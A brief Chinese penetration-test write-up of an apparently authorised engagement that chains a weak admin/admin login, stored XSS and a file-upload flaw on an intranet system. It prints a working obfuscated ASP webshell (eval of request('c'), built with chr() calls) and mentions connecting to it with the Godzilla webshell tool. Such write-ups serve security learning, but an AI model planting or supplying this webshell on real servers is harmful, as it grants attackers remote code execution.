授权项目上的渗透测试，漏洞有网站弱口令—存储型XSS—文件上传。

前言

本文由知识星球《网络安全情报攻防站》星友堂主投稿，感谢投稿。授权项目下常规的渗透测试。欢迎朋友们积极投稿，投稿有奖励。天冷了来领奶茶钱

正文

网站首页

首页啥都没有，找到网站后台

弱口令

试试admin\admin

由于是内网业务系统一发直接干进去了

XSS漏洞

后台上传文件处

文件上传

免杀木马

<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>连接密码为:c

还是在这里上传

哥斯拉

测试完毕，编写报告交差。

总结

在进行常规的渗透测试时，看到功能点要进行挨个测试，指不定就有漏洞，细心一点干就完了。